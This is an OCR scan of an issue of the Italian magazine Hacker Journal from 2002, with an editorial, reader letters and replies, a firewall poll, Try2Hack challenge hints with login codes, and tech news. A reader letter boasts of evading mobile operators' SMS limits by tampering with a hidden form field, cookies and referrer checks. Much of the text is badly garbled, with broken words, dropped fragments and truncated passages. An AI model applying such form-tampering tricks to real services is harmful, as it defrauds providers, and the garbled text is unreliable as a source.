

Uno studio del WWF afferma che la terra 
diventerà inabitabile verso l'anno 2050. Se 
l'uomo non smetterà di inquinare e consuma- 
re le risorse naturali ai ritmi attuali, dovrà per 
forza colonizzare altri pianeti. 

Probabilmente la progettazione di un 
viaggio interplanetario è fuori dalla portata 
tecnica anche dei lettori più sgamati, ma di 
questi tempi molti di noi hanno intrapreso un 
viaggio addirittura intergalattico. Dopo il pia- 
neta Napster, anche il sistema di scambio file 
AudioGalaxy ha ceduto, e ha chiuso i rubinet- 
ti. Non è più possibile scaricare musica gratui- 
tamente. La "galassia" è stata attaccata dai 
colossi dell'industria discografica. Una razza 
più agguerrita dei Klingon, più fredda dei 
Borg, e dotata di droidi da guerra ferocissimi: 
gli avvocati. Non ci resta che accendere i mo- 
tori a curvatura, e fare rotta verso altri sistemi 
stellari: GNUtella, arriviamo! 

grand@hackerjournal.it 



Ormai sapete dove e come trovarci, appena 
possiamo rispondiamo a tu tti, anche a que lli 
incazzati. Parola di hacker. 
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Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione 
ne espandere le loro capacità, a differenza di molti utenti, che preferiscono 
irare solamente il minimo necessario." 



Danni in rete 

Nuove vittime! 
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ROF I ITATENE, 



VORARE SUE 




OPEN SOURCE 



La sicurezza, una toppa alla uolta 
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• non distinguo una 
vena da un'arteria 
ma non ho mai det- 
l to di essere un chi- 
rurgo. Eppure pa- 
re che questo 
buonsenso in 
qualche modo non 
venga sentito da al- 
cuni webmaster. Mi 
riferisco solo ai *WM* di 
alto livello, quelli dai com- 
pensi stratosferici. Vabbè, io non solo edito pa- 
ginette Web, ma provo molto piacere nell'ana- 
lizzare il codice altrui. Da qui deriva l'idea che 
molti webmaster appartengano a una di que- 
ste categorie: 

* Idioti che, magari in buona fede, lavorano 
senza aver capito un Razzo; 

* Allievi di qualche Cepu-Like school, che CI ri- 
tengono stupidi; 

* Semplici imbroglioni. 

Okay, prendiamo la seconda categoria e 
cerchiamo qualche sito che faccia da esempio! 
lo sono diventato dipendente dagli SMS, e a un 
certo punto ho sentito il bisogno di una inter- 
faccia con la mia rubrica, che non avesse biso- 
gno di login... www.omnitel.it: SMS abbastan- 
za puliti e puntuali, bene! Un occhio alla pagi- 
na di conferma di invio, quella che appare do- 
po il form principale, e oplà 'input type hidden' 
con il prefisso, il numero ed il testo del mes- 
saggio, ma in più un typeopen=1 e una varibi- 
le che mi fa balzare sulla sedia: count=0... 
cut&paste della pagina, faccio il submit norma- 
le del form. "Sms Inviato Correttamente, ti 
restano 4 sms da inviare oggi", torno al 
form di invio scrivo qualche cazzata, premo in- 
vio e mi butto di nuovo nel codice di conferma: 
come temevo (per loro), count è stata incre- 
mentata di una unità. 

Via con la prova del 9! Rendo assoluto l'URL 
dell'action del form salvato, metto count a e... 



"Sms Inviato Correttamente, ti restano 4 
sms da inviare oggi"! 

Ma è solo il primo round. Comincio a conta- 
re gli SMS inviati, per vedere dopo quanto si 
sarebbero accorti del loro errorino. Qualcuno 
lassù ogni tanto darà un occhio al log di opa- 
che...? Bah, probabilmente sono Kilometri di 
log all'ora, se non hanno un robottino che fa 
qualche controllo statistico, dubito che occhio 
umano riesca a notare l'insistente presenza del 
mio IP... Sul più bello faccio uno script php che 
genera l'interfaccia con rubrica direttamente 
dalle sim card, ma arriva lo stop. Dopo l'invio 
compare un bel 404, hanno rimosso la pagina, 
qualcosa si sta muovendo, che emozione! ;] 

E sul sito, alla pagina degli SMS campeggia 
la scritta "bla bla . . . manutenzione . . . bla 
bla. . . ". Alla riapertura, il codice client side 
non è cambiato, ma la varibile count non ha 
più effetto, si torna a cinque messaggi al gior- 
no... C'è un controllo da parte server. Avranno 
fatto un corso di specializzazione? No, count è 
passata ai cookies!! :] Okay grazie ragazzi! 
Cancello i cookies, invio un messaggio... azz! li 
contano comunque! Chiedo ad IE di non accet- 
tare biscotti da omnitel.it... navigo fieramente 
verso la home page e vengo kikkato verso una 
pagina che con un font +5 mi dice "FORBID- 
DEN! You cannot access this domain with 
disabled cookies"... minxxia hanno vinto? 
mentre me ne faccio una ragione, IE mi sugge- 
risce il vecchio uri completo del form sms... ge- 
niacci! Su quello non c'è il controllo dei cookies 
abilitati. Forse non avevano voglia di copiare 
ed incollare il codice di controllo su tutte la pa- 
gine? Forse. Forse lo fanno di proposto per far- 
si sbeffeggiare? Risolti i cookies la storia ri- 
prende a funzionare... Bloccando l'accesso in 
lettura e scrittura di cookies, viene offerta di 
nuovo la pagina vergine con 5 sms di credito 
giornalieri... costanti. 

Cambio di gestione in azienda e ammoder- 
namento del sito, ma le variabili SMS non ven- 



gono cambiate. Passa qualche mese e l'inter- 
faccia subisce uiv r/jovo stop and go. Viene ag- 
giunto un nuovo controllo in fase di invio, pre- 
cisamente un check sul referrer e il nuovo ter- 
rore è la scritta "spiacenti, la richiesta 
proviene da un sito non autorizzato", i .. 
meno questa verrà loggata da qualche parte? 
Chissà. Modificare gli header per sfalsare il re- 
ferrer? Non ho voglia e non ho tempo... E' la fi- 
ne degli invìi sms dal pinguino. :( 

K 4 /2 non da Windows. Ho cercato documen- 
tazione ovunque, ho chiesto in giro, ma nessu- 
no mi ha mai illuminato... Pare che l'Active 
Desktop di Winzozz non invìi referrer o comun- 
que generi qualche "pettino" (come si dice dal- 
le nostre parti) che da fiducia a Vizza vi. Non 
solo ricomincio copiosamente a inviare SMS, 
ma smetto di dire che mettere una pagina html 
sullo sfondo di Windows sia una stronxata... 

Oggi il bug di explorer è stato risolto, e an- 
che la pagina di Vizzavì per inviare sms è sog- 
getta a restrizioni più severe... il gioco è finito, 
il "Real Active Dezktop" è morto, ma ha inviato 
circa 50*10^3 sms. lo ho raggiunto consape- 
volezza che siti anche grandi prendono la "si- 
curezza" sotto gamba, e posso assicurare che le 
cose fatte a caRRo sono più di quante se ne pos- 
sano immaginare. Anche se non vengono cor- 
si rischi, può comuque essere criticata la scelta 
del team di sviluppo di questi progetti da 
1,000,000 di visite al giorno... 

Contenti loro, contenti tutti. 
Noi in particolare. 

by HCSIelKapo 

Questa mail ci è arrivata in modo anonimo, 
e non abbiamo altro modo di rispondere a 
HCSIelKapo se non pubblicandola. 
Ciò che fa pensare è il fatto che, invece di svi- 
luppare una piattaforma sicura da subito, o 
quanto meno dopo le prime evidenti violazioni, 
l'azienda in questione abbia deciso di "metterci 
una toppa provvisoria" ogni volta che il rimedio 
precedente veniva aggirato... Cioccolatai? 



UN GIORNALE PER TUTTI: SIETE NEUJRIE UERI HRCKERS? 
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MIO HACKING 



Il mondo hack è fatto di alcune cose facili e tante cose difficili. Scrivere di hac- 
king non è invece per nulla facile: ci sono curiosi, lettori alle prime armi (si fa 
per dire) e smanettoni per i quali il computer non ha segreti. Ogni articolo di 
Hacker Journal viene allora contrassegnato da un level: NEWBIE (per chi co- 
mincia), MIDHACKING (per chi c'è già dentro) e HARDHACKING (per chi man- 
gia pane e worm). 
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NEL PROFONDO BLU 

La mia sarà una mail breve e concisa, in- 
fatti vorrei fare i miei complimenti a chi da 
alcuni anni a questa parte si impegna a 
compiere delle vere e proprie imprese anoni- 
me per dare a chi se lo merita una bella le- 
zione. 

Tenendo conto che la maggior parte delle 
volte in cui sentiamo parlare di hackeraggio 
ci vengono in mente virus worm e spionag- 
gio informatico, vorrei anche ricordare a co- 
loro i quali f" 



Si pensi quindi al bene che in un certo senso 
questi geni del computer possono fare. Dopo 
questa "piccola" parentesi, volevo solo fare 
un po' di pubblicità ad un libro che spero 
piaccia a tutti i lettori. Si tratta di Profondo 
Blu di Jeffery Deavers un thriller basato 
esclusivamente su internet, questo è il link 
dove poter leggere la trama: 
www.kwlibri.kataweb.it/best_seller/ 
best 270901. shtml 



'EMERY 

BYIR 



Accettiamo i complimenti 
per la rivista, ma noi non 
intendiamo giustificare chi 
"per fare qualcosa di di- 
verso", fa danni a destra e 



L'atteggiamento di chi 
vuole capire come funzio- 
nano le cose, è qualcosa di 
diverso. Ci uniamo invece 
volentieri ai tuoi apprez- 
zamenti per Profondo Blu, romanzo molto 
intrigante. 



PRECISAZIONI SULLA SLACKWARE 

Salve Gentilissimi, scrivo per farvi notare 
alcuni difettucci di percorso sulla descri- 
zione di Slackware che ho trovato sulle pa- 
gine del vostro giornale dedicate alle dis- 
tro del pinguino. 

1) Slackware è la prima distro ufficiale, non 
"una delle prime". (Aprile 1993) 

2) Non è vero che non c'è interfaccia grafica 
(ma l'avete mai installata una Slack?) come 
avete fatto a scrivere quella boiata con tut- 
to il rispetto anche un tonto si sarebbe det- 
to: "Ma basta installare X e l'interfaccia gra- 
fica non può non esserci!" forse volevate di- 
re che mancano le GUI per la configurazio- 
ne del sistema che va fatta a mano? 

3) Non è vero che : "..le forme di pacchettiz- 



zazione sono bandite.. 11 gli rpm s 




4) Due release in sei mesi, e le due migliori 
vorrei sottolineare, non mi sembra che sia 
così lasciata a se stessa ; forse volevate di- 
re che ™ 
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La sezione Propaganda del sito di Slack- 
ware ha decine di immagini come questa. 



ta praticamente adottata come 
da tanta di quella gente in rete da 
far collassare un database? 
Con tutto il rispetto mi sono un po' risentito 
per la descrizione dell'unico e solo vero Li- 
nux che non è apprezzato tanto per la sua 
stabilità o per la sua "pulizia" ma per lo sti- 
le BSD SySV che caratterizza la sua struttura 
il suo init e tutta la configurazione. Il fatto 
che il kernel non viene patchato e resta lim- 
pido come Dio Linus lo sforna è un punto di 
forza che rende questa distro sicuramente la 
più veloce. Inoltre non sono d'accordo che 
sia poco accessibile nella mia azienda stia- 
mo istruendo il personale per l'utilizzo di 
Slack e debbo dire che crea veramente mol- 
ti meno inconvenienti di altre (vedi red bug). 
Cmq complimenti per l'iniziativa che resta 
buona anche se riferita a un pubblico non 
certo di un skill tecnico molto elevato. 



Oplà. Quando si rilascia una nuova versio- 
ne, bisogna mettere in evidenza i bachi di 
quelle precedenti, e ben vengano le precisa- 
zioni. Eccoti accontentato. 
Confermo però che, parlando di "mancanza 
di interfaccia grafica", ci riferivamo proprio 
alla configurazione del sistema, e non all'as- 
senza di una GUI per il suo utilizzo. Poi, il 
folletto di redazione (ce ne è uno in ogni 
giornale o rivista, giuro), si è divertito a ta- 
gliuzzare qualche parola di troppo da M'im- 
paginato e... 



UN TROJAN SUL SITO? 

Sono una lettrice un pochino delusa e spero 
non mettiate volontariamente a disposizio- 



ne dei vostri lettori 
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anche perché altrimenti se 
dobbiamo attenerci alla definizione di hac- 
ker che appare sempre sulla rivista e cioè 
"persona che si diverte ad esplorare.." forse 
dovreste rinominare rivista e sito "cracker 
journal", o devo pensare che la suddetta 
esplorazione riguardi principalmente i com- 
puter dei vostri lettori? 

Irene108 

Tranquilla, il file non è infettato da alcun vi- 
rus. Si tratta di una falsa segnalazione, co- 
sa che a volte può capitare anche nelle mi- 
gliori famiglie. 

AIUTOOOO! 

" , non sto per morire, però sono preoc- 



ellato tutto, ho fatto be- 
ne a preoccuparmi? Sono ancora infettato? 
Ho provato con AD-AWARE, è un buon pro- 
gramma?...^ cosa serve?????? 
Ho anche ricevuto e avviato L'EMULATORE 
per XBOX" ma ho saputo che in realtà è un 
trojan, è vero? Come poso fare per liberar- 
mene? 

gandalf86 

Allora impara subito una cosa: non aprire 
_mai_ programmi eseguibili di provenienza 
dubbia (i siti che distribuiscono crack ed ex- 
ploit sono da considerarsi di scarsa affida- 
bilità). Devi sempre dubitare dei file che ti 
arrivano per posta, di quelli che trovi sui 






sT /XW\P ] 



COR AGGIO 



OSARE 



I ND I PENO E NT 



TUTl 



TROLL E BUOI DEI PAESI TUOI 

Salve sono un lettore della vostra rivista, 
volevo farvi i compimenti perché e vera- 
mente interessante... visto che voi siete 
esperti in questo campo avrei una cosa da 
chiedervi... 
Ho un problema. io frequento una chat ire, 



ìe frequenta- 



Insomma per capirci ^ v .. v 
stron*o... allora un modo per far capire a 



questo stupido che non devo + rompere sa- 
rebbe utilizzare i famosi nuke, in modo da 
farlo disconnettere oppure farle cadere la 
connessione alla chat... 

lo ho provato a scaricarne qualcuno ma non 
funzionano + di tanto, anzi nulla, non ci so- 
no mai riuscito... voi potreste essere così 



gentili da inviarmi in allegato, oppure 



suggerite il nome di un sito 
funzioni bene...? 

io non ho intenzioni di fare altre stupidag- 
gini, mi serve solo per far capire a questo 
stupido che la deve smettere di insultare la 



gente. .così a furia di lasciare la chat senza 
che lui lo voglia capirà che la deve finire!! 

Si può fare, ma l'arma migliore contro i Troll 
(chi entra in un canale, newsgroup o forum 
col solo scopo di creare scompiglio), è sem- 
pre l'indifferenza. Ingoralo, e invita gli altri 
a fare altrettanto, magari inserendolo nella 
lista degli utenti da ignorare, se il tuo client 
lo permette. 

Investi le tue energie in qualcosa di più in- 
teressante; dichiarandogli guerra fai solo il 
suo gioco. 



newsgroup o nei forum di discussione. La 
prima cosa da fare, è farli analizzare da un 
buon antivirus. In seguito, puoi provare a 
installarli su un computer in cui non ci siano 
dati importanti, o che non usi per studio o 
lavoro, e verificare che non sia stato instal- 
lato alcun trojan. 

Se non puoi permetterti un computer per le 
sperimentazioni, puoi collegare un secon- 
do hard disk per utilizzare due sistemi (fai 
in modo che il sistema di sperimentazione 
non possa accedere a quello di lavoro), 
oppure usare diverse partizioni, magari 
con un programma come Partition Magic 
che permette di "nascondere" le partizioni 
luna all'altra. 

Ah, AdAware serve a individuare e rimuo- 
vere i programmi AdWare (o SpyWare), che 
qualche shareware installa sul tuo compu- 
ter per spararti banner in base alle tue pre- 
ferenze. Questi programmi sono una poten- 
ziale minaccia alla tua privacy, e AdAware 
si preoccupa di metterci qualche toppa. Con 
le tue abitudini di navigazione, però, gli 
SpyWare sono solo il male minore. Del re- 
sto, se credi a qualsiasi programma affermi 
di essere un "emulatore XBox"... 

AH, DOTTORE DOTTORE... 

Mi sono già congratulato con il Boss sul- 
la Vs. iniziativa editoriale che certa- 
mente ha da maturare e crescere e passia- 
mo alle domande: 



1) cosa fare per 



pò la scadenza, non possono più ri 

2) come prevenire tale inconveniente? 
Grazie anticipate. 

Zago Nero 





Se, come si deduce dal "Dott." che si legge 
nel campo From della sua mail, lei è vera- 
mente un laureato, rivolgerei proprio a lei 
l'invito a "maturare e crescere"; che fa, 
cracca le demo come i ragazzini? Per eli- 
minare l'inconveniente, può cominciare col 
pagare il prezzo dello shareware e regi- 
strarlo. 

Non ci si può lamentare del costo spropo- 
sitato di certi pacchetti software, se poi si 
soffoca la loro concorrenza (gli sviluppa- 
tori indipendenti di shareware) a suon di 
crack e numeri seriali copiati. 
Se anche il pugno di dollari richiesti fosse 
troppo, può passare al software libero: so- 
no poche le cose che non si possono fare 
con i programmi gratuiti disponibili nella 
libreria GNU (www.gnu.org/directory). 



Sondaggio 



Quale è H miglior Firewall? 



ZurMjAldrm 



No-rton 
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Tifty Firewall I A^V-a 
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Voti Totali: 

Tra i primi due firewall della classifica 
e gli altri concorrenti non c'è proprio 
confronto: si passa da un 32% di 
preferenze del secondo posto, a un 
misero 8% per Blacklce al terzo. 
Segno forse che i firewall ancora non 
sono una categoria di software molto 
conosciuta. Per questo, forse, spiccano 
i prodotti che si sono distinti per 
qualità e prezzo (Zone Al arni è senza 
dubbio un prodotto molto buono ed è 
gratuito per uso personale) e quelli 
che hanno il marchio più conosciuto 
(da vent'anni, Norton è il nome più 
famoso nel campo delle utility). Ci 
sentiamo di spezzare una lancia per 
Tiny Firewall, che ha ottenuto poche 
preferenze ma è un prodotto gratuito, 
abbastanza completo e richiede poche 
risorse (anche se forse un po' più 
complicato da usare di ZoneAlarm). 
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LINEE ROVENTI 

~<iao HJ, nell'ultima bolletta Telecom mi 
• sono trovato una bella sorpresina. Un 
addebito di 55 euro + IVA relativi a chia- 
mate da me non effettuate. Queste chiama- 
te nel dettaglio telefonico sono catalogate 
come "internet 70x" e sono particolarmente 
costose, in quanto la cifra di cui sopra è re- 
lativa a soli 37 minuti di collegamento. Cre- 
do che questo sia stato causato da una re- 
direzione della chiamata da parte di qual- 
che sito fraudolento verso provider complici 
situati in qualche paese straniero. Ho due 
domande da farvi: 



ossibile tecnicamente che la 



_j (utilizzo linea ISDN, 
ma con modem analogico, avrei dovuto 
sentire i toni?); 

ossibile installare ner auesto dell 



su internet in mo- 
do da identificare, tramite l'incrocio dei da- 
ti orari, i siti colpevoli di questa truffa. 
Grazie e a presto, 

Filippo 



Evitate di mandarci 
schifezze!!! 



icevono tonn 
rBS e COM. Al 
no palesemente dei virus di cui anc 
ttente è all'oscuro. Qualcuno però ci 
/iato degli eseguibili scrivendo "cosi 
pensate del programmino che ho reali 
to"? Ma per chi ci avete preso? Noi 
iriamo nessun programma o file ese 
■le arrivato per posta (tra parentesi, i 
suno dei computer con cui scarichiam 
posta usa Windows). Volete sottoporc 
programma? Inviateci i sorgenti: è più : 
e avremo modo di vedere davvero.., 
sa c'è sotto. 
A proposito di schifezze, se ci mandate < 
coli o documenti, non utilizzate il fon 
n oc di Word: i file pesano un'enormità 
> attaccabili dai macro virus e costrim 
•te a comprare software proprie 



Sei vittima di un dialer, un programma 
che stacca la linea e si ricollega a Internet 
ma chiamando un numero internaziona- 
le. Solitamente, i dialer vengono scaricati 
ed eseguiti per accedere a siti erotici o 
per scaricare loghi e suonerie per i cellu- 
lari. Il fatto di avere ISDN probabilmente 
rende il funzionamento del dialer così ve- 
loce che non ti rendi conto della chiusura 
e riapertura della linea. 
In ogni caso, anche con un modem potre- 
sti non rendertene conto, notando solo un 
lieve rallentamento. 

Il dialer potrebbe infatti inserire nella 
stringa di inzializzazione del modem i co- 
dici per disabilitare l'altoparlante (ATLO o 
ATMO). 

Per verificare le chiamate effettuate, puoi 
utilizzare dei programmini che servono a 
tenere il conto degli scatti effettuati; ne tro- 
vi a bizzeffe anche in Italiano. 
Cerca "contascatti" o "dialer" su 
http://www.volftp.it e scegli quello che pre- 
ferisci. In ogni caso, Telecom può fornirti 
senza dubbio gli orari delle chiamate (chie- 
di la bolletta trasparente). Se invece vuoi 
una soluzione preventiva, puoi provare 
Dialer Control, un programma che promet- 
te di impedire le connessioni operate dai 
dialer, chiedendo ogni volta una conferma 
dell'utente. Lo trovi su 
http://www.dialercontrol.de/download.php. 

SORGENTI LINUX 

Ciao a tutta la redazione di Hacker Jour- 
nal vorrei sapere il sito web dove si può 
scaricare il codice sorgente di Linux. 
CIAO 

dragoOI. 
P.S. ma la vostra chat non funziona più? 

Se per Linux intendi il solo kernel, lo puoi 
scaricare da www.kernel.org. Troverai molti 
differenti file, alcuni dei quali ancora in fase 
di sperimentazione. 

Probabilmente, quello che ti interessa è 
quello dell'ultima versione stabile, che solita- 
mente è il primo della lista. Tieni presente 
che si può capire se una versione è stabile o 
ancora in fase di sviluppo osservando il nu- 
mero di versione. Se il primo numero dopo il 
punto è pari, è una versione stabile. 
Se è dispari, è invece una beta. Per esempio, 
la versione 2.4.18 è stabile (perché 4 è pari), 
mentre la 2.5.24 è beta (perché 5 è dispari). 



Se quello che vuoi invece è un'intera distribu- 
zione del sistema operativo GNU/Linux, puoi 
scegliere quella più adatta alle tue esigenze 
da www.linux.org/dist. 

La nostra chat funziona ed è altamente fre- 
quentata: riprova, magari cancellando la ca- 
che del browser. 

SCACCO ALLA SICUREZZA 

I I o trovato interessante il vostro II nume- 



I I ro con i problemi di sicurezza su ICQ e 
MSN. Domanda: 



1E o il conegamemo ai sito 

e a dama sono a pericolo ficcanascj E 
quanto? 

Ogni porta aperta è un pericolo potenziale, e 
ti costringe ad aprire un buco in più nel fire- 
wall (perché tu usi un firewall, vero?). Del re- 
sto, l'unico computer sicuro è quello spento, e 
scollegato da rete e modem (ammesso ovvia- 
mente che ti sia ricordato di chiudere a chia- 
ve la porta della stanza). 

BISCOTTINI AMARI 

-*"> iao sono un lettore dei primi 2 nume- 
ri e il secondo, tra le altre cose titola- 



Arretrati 

e abbonamenti 



er Journal, che ormai stanno dive 
igeiti da collezione. Stiamo cercar 
ire le strutture necessarie, ma pc 
ssere necessario un po' di temp< 
, potete trovare i PDF di tutti i \ 
ìr\ sul sito (www.hackerjournal.it 
ivista.htm), e già che siete sul 
etevi alla nostra mailing list: s 
ati non appena i servizi abbonai 
etrati saranno disponibili. 
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CORAGGIO DI OSARE: INDI PENDENTI DA TU Ti 



va "via gli odiosi biscottini". ALLORA mi 
spiegate perchè il vostro sito li usa?!?!? 

Perché cose come i Forum, i sondaggi e il 
GuestBook non possono funzionare sen- 
za. Il vero problema non sono i cookie 
temporanei che ti lascia un sito web per 
il suo funzionamento, ma quelli dei net- 
work pubblicitari che creano database 
permanenti con le tue preferenze di na- 
vigazione. In ogni caso, ti abbiamo spie- 
gato come liberartene, se vuoi. 



Le porte dei server sono 
per te familiari come quella 
del frigo di casa? 
Sai tutto di protocolli e servizi 
(ma non pensi che queste due 
parole indichino qualcosa 
di burocratico o la toilette)? 
Ti colleghi gratis alle hot line 
fischiando nella cornetta 
del telefono? Oltre a questo, 
ti piace scrivere, e ti riesce pure 




bene? Hacker Journal cerca 

collaboratori. 

Mandaci una mail a: 

redazione@hackerjournal.it 

indicando in quali settori ti senti 

più ferrato e di cosa vorresti 

parlare. 

Per i prossimi articoli, cerchiamo 

esperti di: Telefonia, Macintosh, 

utility per Windows, virus 

e trojan. 



Try2Hack, fate vedere di che pasta siete fatti! 



'RYgHACK : MET" 



PROVA LA 



ramente a passare dei livelli di protezio- 
ne? Dimostratelo al mondo e a voi stes- 
si cercando di superare i dieci livelli di 
difficoltà del giochino Try2Hack (che si 
legge "try to hack"), presente sul nostro 
sito www.hackerjournal.it. 
Il gioco consiste nel superare i vari livel- 
li, inserendo ogni volta le password cor- 
rette (oppure arrivando in altri modi al- 
le pagine protette da password). 
Per farlo, potreste avere bisogno di alcu- 
ni programmi (Macromedia Flash, Soffi- 
ce, VisualBasic). 

Di tanto in tanto qualche lettore ci scrive 
per dire che alcuni livelli sembrano non 
funzionanare. Noi vi possiamo assicura- 
re invece che tutti quanti funzionano 
esattamente come dovrebbero. 
Chi ha orecchie per intendere... 



Nuova password!!! 

Ecco i codici per accedere alla Secret Zone 
del nostro sito, dove troverete informazioni 
e strumenti interessanti. Con alcuni browser, 
potrebbe capitare di dover inserire due vol- 
te gli stessi codici. Non fermatevi al primo 



user: 
pass: 



hcas8 
l2sd7 




-rir.y^Hick 




Ti&^Bte&fc 



tiamo ancora elaborando < 
statistiche affidabili, ma pare eh 
circa il 40% dei lettori che si cimen- 
ta riesca a superare la password de 
primo livello. Da lì in poi, il numer 
cala vistosamente, forse perché bi- 
sogna utilizzare qualcosa di più so- 
fisticato del semplice Blocco Note (e 
questa è già una dritta...). 

Come dite? Volete una dritta anche 
per il livello 2? Anche a occhio si ca- 
pisce che la pagina non è composta 
da semplice Html. Provate a guar- 
dare dentro all'oggetto incluso nel- 
la pagina e... tenete i riflessi pronti 
quando premete Invio: dovrete es- 
sere molto rapidi. 

Il livello 3 è infatti costituito da un 
breve alert in JavaScript, che com- 
pare immediatamente, impedendo 
ogni altra azione nel browser. A 
buon intenditor... Per stimolarvi un 
po', il livello 4 ve lo facciamo solo 
vedere, qui a lato. Il suggerimento 
lo pubblicheremo sul prossimo nu- 



Mandateci una mail a: try2hack@hackerjournal... 
scrivendo il numero del livello a cui siete arrivati < 
sword di tutti i livelli precedenti. Sui prossimi numeri pub- 
blicheremo l'elenco dei migliori. 
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O SUICIDA UNO DEI 
PADRI DI GNUTELLA! 

Notizia dell'ultimo minuto: Gene 
kan, si è suicidato il 29 giugno 
2002. Grande scalpore sulla Rete per la no- 
tizia della morte di Gene Kan, giovanissimo 
pioniere delle tecnologie di rete nonché fauto- 
re del più celebre dei network peer-to-peer: 
Gnutella. Estenuo difensore dell'operi source e 
della libertà sulla Rete, Gene Kan si è suicida- 
to dopo un periodo di forte depressione. Ulti- 
mamente, in collaborazione con gosilent.com 
ha dato vita alla nascita di Infrasearch, un si- 
stema di ricerca basato sulla sua visione di 
computing distribuito. Un piccolo specchio di 
Gene Kan si può visitare su http://www.gone- 
silent.com, ma tutti i maggiori siti di informa- 
zione on-line danno il loro tributo alla memo- 
ria di Kan. All'Università di Berkeley, in Califor- 
nia, dove Kan si è laureato nel 1997, sono già 
in corso i preparativi per lanciare un memorial 
fund dedicato al giovane genio informatico, rà 

O IL SITO DI VLADIMIR 
PUTIN SOTTO ATTACCO 

i m sole 24 ore dalla propria nascita, il sito 

I r\ del presidente russo Vladimir Putin 

(http://president.kremlin.ru) ha 

subito una considerevole serie di attacchi di 
varia natura da crackers a caccia di fama. 
In quasi un centinaio hanno immediatamente 
cercato di violare il server web, o quantomen- 
to di "buttarlo giù" mediante un DoS. 
Sembra però che nessuno sia riuscito nell'in- 
tento: la società AYAXI, vincitrice dell'appalto 
per la realizzazione del sito web, ha affermato 
orgogliosamente di aver impiegato circa 1 
mesi per rendere il proprio lavoro 
"a prova di hacker". Almeno per ora, 
pare proprio che abbiano ragione, rà 



* 



O PALLADIUM: SICUREZZA O CONTROLLO? 



□ 




Microsoft ha annunciato di stare lavorando a 
una piattaforma hardware e software per 
rendere più sicuri i PC. I più maliziosi staranno 
già ridendo, pensando alla lunghissima serie di 
scivoloni sul tema sicurezza in casa Microsoft, 
ma forse questa volta c'è poco da ridere. 
Le poche informazioni ufficiali riguardo a Palla- 
dium lasciano intendere che questo sistema 
funzionerà a un livello inferiore ri- 
spetto a quello del sistema operati- 
vo, e sarà fortemente integrato nel- 
l'hardware (che sarà presumibilmente svilup- 
pato in collaborazione con Intel e Amd). 
Palladium creerà una sorta di area protetta nella 
memoria e nel disco fisso; a questa memoria po- 
tranno accedere soltanto le applicazioni, i servizi 
e gli utenti in possesso di una chiave di autenti- 
cazione valida. In caso di tentativi di violazione, il 
sistema dovrebbe bloccare l'accesso, e sostitui- 
re le chiavi. Un sistema analogo viene utilizzato 
già sulla console da gioco XBox, sempre di Mi- 
crosoft, per impedire il funzionamento della mac- 
china se alcune componenti hardware o softwa- 
re sono state modificate (in pratica, per impedire 
i chip di modifica per l'esecuzione di giochi co- 
piati). Insomma, un trojan o un virus non avreb- 
bero vita facile su un PC dotato di Palladium, per- 



ché verrebbero immediatamente isolati e messi 
in condizioni di non nuocere. Proprio qui però si 
aprono alcuni scenari inquietanti. 
Allo stesso modo dei virus, si potrebbero in 
realtà bloccare una serie di programmi e servizi 
poco graditi ad aziende (Microsoft prima di tut- 
te) e governi; per esempio potrebbero es- 
sere bloccati tutti i programmi che 
riproducono audio e video non pro- 
tetti (come Mp3 e Avi). si potrà inter- 
venire alla fonte: tutte le comunicazioni all'inter- 
no del PC saranno cifrate, e non si potrà regi- 
strare un flusso di dati (come avviene per 
esempio nel rippare un Cd audio o un Dvd), se 
non da parte delle applicazioni autorizzate. 
Insomma sul proprio computer sarà 
possibile installare, solo software 
certificati, approvati e autorizzati da 
Microsoft. 

Come risultato, diventerebbe impossibile fare ciò 
che si vuole con i propri dati (trasportare su Mp3 
i CD regolarmente acquistati è perfettamente le- 
gale, se non li si diffonde ad altri). Insomma, se 
Palladium diventasse realtà, gli 
utenti vedrebbero diminuire ancor 
di più la propria possibilità di sce- 
gliere quale tipo di software installare e utiliz- 
zare sul proprio computer. 
Secondo alcune affermazioni fatte da rappresen- 
tanti Microsoft, l'utente avrà la possibilità di dis- 
inserire Palladium e non utilizzarlo; basta però 
vedere quante persone utilizzano browser diver- 
si da Internet Explorer, per capire che solo pochi 
sono così smaliziati da modificare in qualche 
modo le opzioni proposte dal produttore del si- 
stema operativo. Due ottimi articoli di Paolo Atti- 
vissimo su Palladium sono stati pubblicati su 
Apogeonline.com e Zeusnews.com. rà 



O UN INCONTRO TRA AMIGHI 



□ 



Si terrà al Palaesposizioni di Empoli (FI) nelle 
giornate del 21 e 22 settembre la sesta 
edizione della manifestazione Pianeta 
Amiga, dedicata ai fan del famoso 
computer Commodore. Quest'anno si 
preannunciano importanti presenze 
internazionali e novità eclatanti, ci sarà spazio 
per presentare anche altre piattaforme, come 
Linux, Mac e BeOS. Tutte le informazioni sul 
programma e su come partecipare si trovano 
all'indirizzo www.pianetaamiga.it. rà 




AMIG\ 



"-ERRARE È UMANO, MA PER FARE DAVVERO CASINO, 
HAI BISOGNO DI UN COMPUTER*. 

> Dall'Almanacco del Contadino, 1978 
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NEWS 



O HACKER DELLA NASA: LA PISTA POLACCA 



□ 




ii cerca in Polonia l'hacker che, tempo fa, ha 
> violato alcuni sistemi della NASA, causan- 



do danni per un ammon- 
tare di circa un milione di 
dollari. La magistratura polacca 
ha infatti dichiarato di essere sulle 
tracce del colpevole: le indagini 
sarebbero focalizzate nella zona 
della città di Poznan, nella Polonia 
occidentale. L'hacker avreb- 
be agito da un computer 
di una scuola media su- 
periore. Le indagini parallele 
condotte dall'FBI sarebbero invece 
atte a determinare l'effettivo valore 
delle informazioni sottratte al ser- 
ver violato. L'ambasciata americana a Varsavia, 
per ora, non ha rilasciato nessun commento, rà 



O ATTACCHI INFORMATICI: ITALIA 
NELLE PRIME POSIZIONI 



□ 



Se la delusione per la 
prematura fuoriuscita 
dall'ultimo mondiale di 
calcio della nostra nazio- 
nale è stata cociente, 
possiamo risollevarci il 
morale al pensiero che il 
nostro paese figu- 
ra come secondo 
tra quelli da cui 
proviene il mag- 
gior numero di at- 
tacchi ai sistemi in- 
formatici sparsi per 
il mondo. 

Lo studio statistico è sta- 
to condotto da una socie- 
tà di sicurezza e si basa 
sui dati raccolti da mi- 
gliaia di Intrusion Detec- 
tion Systems: gli allarmi 
sono stati quasi 22 milio- 
ni, durante il periodo che 
va da marzo a giugno del 
2002. La porta presa 
maggiormente di 
mira dagli attac- 
canti è natural- 
mente la 80, ovvero 
quella che gestisce la quasi totalità delle con- 
nessioni web/http: su di essa il 68% dei tentati- 
vi di intrusione. Seguono attacchi alla 
I/O SNMP, con 111%, FTP (6%), 
SMTP (5%). Le tipologie di attacco vedono in 
